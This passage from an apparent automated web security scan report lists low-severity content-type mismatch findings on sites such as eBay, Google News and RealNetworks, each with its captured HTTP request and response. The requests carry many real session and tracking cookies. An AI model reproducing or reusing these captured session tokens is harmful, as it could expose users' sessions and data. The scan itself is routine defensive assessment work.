Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BMHIGNBjoLb2Zmc2V0af6QnQ%3D%3D--256c58ea27767e4ae2c12bff9fafdb074d0ff1ca

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 03 Sep 2008 05:44:59 GMT
ETag: "9d09aa-1536-563d8cc0"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .....&......... .h.......(... ...@..... .................................%.,.C.J.C.J.C.J.C.J.C.J.A.G.".(...................................................................................
...[SNIP]...

29.15. http://bing.fansnap.com/seats/ajax/get_vfs_data previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bing.fansnap.com
Path:	/seats/ajax/get_vfs_data

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

29.16. http://charts.edgar-online.com/ext/charts.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://charts.edgar-online.com
Path:	/ext/charts.dll

Issue detail

The response contains the following Content-type statement:

Content-type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ext/charts.dll?2-4-e-0-0-512-03NA000000RNWK&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=e0e0e0|A33=e0e0e0-ht=240-wd=540-FT:0=6-AP:9=2|10=2-FB:1=E6E6E6-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=336699-FF:1=336699-FL:18=336699-FF:18=336699-FL:5=000000-FF:5=000000-AT:9=1-FI:-IMAP=1 HTTP/1.1
Host: charts.edgar-online.com
Proxy-Connection: keep-alive
Referer: http://investor.realnetworks.com/stockquote.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: Keep-Alive
Expires: Tue, 19 Jul 2011 21:25:19 GMT
Content-type: text/plain
Content-length: 61

var arrEvents = new Array();

var initialized = true;

29.17. http://i3.onlinehelp.microsoft.com/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://i3.onlinehelp.microsoft.com
Path:	/areas/onlinehelp/content/styles/bing/OnlineHelp_GC.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.18. http://investor.realnetworks.com/common/images/icon_share.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://investor.realnetworks.com
Path:	/common/images/icon_share.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /common/images/icon_share.gif HTTP/1.1
Host: investor.realnetworks.com
Proxy-Connection: keep-alive
Referer: http://investor.realnetworks.com/stockquote.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=93573022.725148803.1311106996.1311106996.1311106996.1; __utmb=93573022.2.10.1311106996; __utmc=93573022; __utmz=93573022.1311106996.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NOMOBILE=0; sifrFetch=true; RNWK_SESSION=1329163465%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A08%27%7D%7C%20%7Bts%20%272011%2D07%2D19%2016%3A25%3A20%27%7D%7C4EE9066889CE5E5F75EED0DA903AF783; RNWK_BRIEFCASE=UPDATED%7C40653%2E6841204; __utma=123436755.2082772103.1311107120.1311107120.1311107120.1; __utmb=123436755.2.10.1311107120; __utmc=123436755; __utmz=123436755.1311107120.1.1.utmcsr=realnetworks.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact-us.aspx

Response

HTTP/1.1 200 OK
Content-Length: 3838
Content-Type: image/gif
Content-Location: http://investor.realnetworks.com/common/images/icon_share.gif
Last-Modified: Mon, 20 Jul 2009 16:54:59 GMT
Accept-Ranges: bytes
ETag: "7b465d15a9ca1:9aecb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:25:22 GMT

.PNG
.
...IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

29.19. http://media.gamehouse.com/7/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.gamehouse.com
Path:	/7/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /7/images/favicon.ico HTTP/1.1
Host: media.gamehouse.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660; __qca=P0-962211929-1311107164228; s_pers=%20s_vnum%3D1468787164284%2526vn%253D1%7C1468787164284%3B%20s_lastvisit%3D1311107164287%7C1405715164287%3B%20s_nr%3D1311107168409%7C1468787168409%3B%20s_invisit%3Dtrue%7C1311108968410%3B; s_sess=%20s_dslv%3DFirst%2520page%2520view%2520or%2520cookies%2520not%2520supported%3B%20s_cc%3Dtrue%3B%20s_v1%3Dsite%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "47e-4a821187bdb40"
Accept-Ranges: bytes
Content-Type: text/plain
Age: 54898
Date: Tue, 19 Jul 2011 20:26:06 GMT
Last-Modified: Fri, 15 Jul 2011 20:00:05 GMT
Content-Length: 1150
Connection: keep-alive

............ .h.......(....... ..... .....@....................................................................{...|............................................. .............y...|...|................
...[SNIP]...

29.20. http://mobile.ebay.com/wp-content/themes/platformpro/images/iconMobileWeb_171x171.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mobile.ebay.com
Path:	/wp-content/themes/platformpro/images/iconMobileWeb_171x171.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /wp-content/themes/platformpro/images/iconMobileWeb_171x171.png HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/mobileweb/ebay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83641^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702d0^cguid/3666b2e01300a47a44d622a6ffc19372500702d0^trm/svid%3D94316858148500702d0^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5Epsi%3DAsWCSaCg*%5E; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:58 GMT
Server: Apache
Last-Modified: Thu, 18 Nov 2010 23:51:31 GMT
ETag: "3b860c-1427-4955c7814c6c0"
Accept-Ranges: bytes
Content-Length: 5159
Cneonction: close
Content-Type: image/png

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

29.21. http://mobile.ebay.com/wp-content/themes/platformpro/images/imgSubPageContBG.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://mobile.ebay.com
Path:	/wp-content/themes/platformpro/images/imgSubPageContBG.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /wp-content/themes/platformpro/images/imgSubPageContBG.gif HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/mobileweb/ebay
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500702fe^cguid/3666b2e01300a47a44d622a6ffc19372500702fe^trm/svid%3D94316858148500702fe^; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83687^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf87%5Epsi%3DAsWCSaCg*%5E

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:00 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 00:14:56 GMT
ETag: "3b85a7-11d-4955ccbd36000"
Accept-Ranges: bytes
Content-Length: 285
Cneonction: close
Content-Type: image/gif

.PNG
.
...IHDR.......t.....m.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..PA..0.......l/.y..&uxI.....z..
.`.z<UD.v.t..B.. .bL\Ff0....Xj"|...D..R.5..Y(uMm..5.."..=...<:_{.......Y....]O..`.Ys\r
...[SNIP]...

29.22. http://news.google.com/news/xhr/eit previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://news.google.com
Path:	/news/xhr/eit

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=UTF-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /news/xhr/eit HTTP/1.1
Host: news.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Referer: http://news.google.com/
Content-Length: 83
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-
Pragma: no-cache
Cache-Control: no-cache

&utu=true&hl=en&ned=us&pz=1&ptoken=AFQjCNF8hDomr7msY7YQPHcfBmmBS_Zzmg:1311108375207

Response

HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Date: Tue, 19 Jul 2011 20:46:48 GMT
Expires: Tue, 19 Jul 2011 20:46:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 2

{}

29.23. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rac.custhelp.com
Path:	/ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

Issue detail

The response contains the following Content-type statement:

Content-Type: application/opensearchdescription+xml; charset="utf-8"

The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/http%3A%2F%2Frac.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png HTTP/1.1
Host: rac.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=AnhSJgx4ASUEbFIiUVJSNVUQBDwDEAE6B3sAMwYmUSsNfwVpV3ECOwUmVV8HL1MmATYBIAEhAWkCaQU5Bg8CeQtBAWpWGgEnVV9SGAY7VQcCWVJvDE0BdgQEUm1RO1JlVTAEIQNrAWgHIwAl; __utma=130296460.418147885.1311107160.1311107160.1311107160.1; __utmb=130296460.1.10.1311107160; __utmc=130296460; __utmz=130296460.1311107160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:58 GMT
Server: Apache
P3P: policyref="http://rac.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Thu, 18 Aug 2011 20:25:58 GMT
Content-Length: 801
RNT-Time: D=104344 t=1311107158371663
RNT-Machine: 01
X-Cnection: close
Content-Type: application/opensearchdescription+xml; charset="utf-8"

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

29.25. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

Summary

Severity:	Information
Confidence:	Firm
Host:	http://real.custhelp.com
Path:	/ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png

Issue detail

The response contains the following Content-type statement:

Content-Type: application/opensearchdescription+xml; charset="utf-8"

The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/http%3A%2F%2Freal.custhelp.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/images%2Ficons%2FSearch16.png HTTP/1.1
Host: real.custhelp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cp_session=UihVIVUhVXFXP1UlUToJfVc4BD8AE1JpUCxaaQAgAHpQIgdrV3FQaQQnU1lSegZzAzQFJFZ2Bm4PZFdrUVhQKwNJCmEHSwQiUlgETgM%2FBzBSN1VUVSZVI1dXVWpROwk%2BVzIEIQBoUjtQdFp%2F; __utma=4935472.196986693.1311107154.1311107154.1311107154.1; __utmb=4935472.1.10.1311107154; __utmc=4935472; __utmz=4935472.1311107154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:50 GMT
Server: Apache
P3P: policyref="http://real.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Expires: Thu, 18 Aug 2011 20:25:50 GMT
Content-Length: 803
RNT-Time: D=112685 t=1311107150274311
RNT-Machine: 17
X-Cnection: close
Content-Type: application/opensearchdescription+xml; charset="utf-8"

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...

29.27. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://realnetworksrealarca.tt.omtrdc.net
Path:	/m2/realnetworksrealarca/mbox/standard

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=2&profile.newhome=true&mbox=gh-newhome&mboxId=0&mboxTime=1311089157342&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1311107151665-897688; mboxPC=1311107151665-897688.17

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:25:51 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 91
Date: Tue, 19 Jul 2011 20:25:51 GMT
Server: Test & Target

mboxFactories.get('default').get('gh-newhome',0).setOffer(new mboxOfferDefault()).loaded();

29.28. http://res.mobileweb.ebay.com/nbinternal/nbblank.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://res.mobileweb.ebay.com
Path:	/nbinternal/nbblank.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/.gif

The response states that it contains a GIF image. However, it actually appears to contain plain text.

Request

GET /nbinternal/nbblank.gif HTTP/1.1
Host: res.mobileweb.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobileweb.ebay.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv; ds2=asotr/b13qzzzzzLCz^ssts/1311100804374^; dp1=bpbf/#20001000000000000451e83658^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c51e83687^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000100000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf87%5Epsi%3DAsoIQKvY*%5E; PdsSession=43b29b151310a47a1206a656ffe78a00; PdsCGuid=43b29b151310a47a1206a656ffe78a00; emvcc=1; nborh=; npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c798450070303^cguid/3666b2e01300a47a44d622a6ffc1937250070303^trm/svid%3D9431685814850070303^

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 18:40:09 GMT
Cache-Control: max-age=7776000
Expires: Mon, 17 Oct 2011 18:40:09 GMT
Content-Type: image/.gif
Content-Length: 60
Date: Tue, 19 Jul 2011 18:40:09 GMT

R0lGODlhAQABAIAAADoSLQAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==

29.29. http://sales.liveperson.net/hcp/html/mTag.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=21661174 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDAQTRSRBT=BCEBMKKDBBGCPDLELDBDMCBE

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=21661174
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1da2"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:19:30 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

29.30. http://sharethis.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sharethis.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: sharethis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==; SERVERID=i-1f43e274; __uset=yes; __unam=8f891fa-13142cc749b-8ad1c19-4; __utma=79367510.1750911955.1311085721.1311085721.1311085721.1; __utmb=79367510.2.10.1311085721; __utmc=79367510; __utmz=79367510.1311085721.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 18:18:19 GMT
ETag: "10d403-57e-cf13b0c0"
Accept-Ranges: bytes
p3p: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 1406
Connection: close

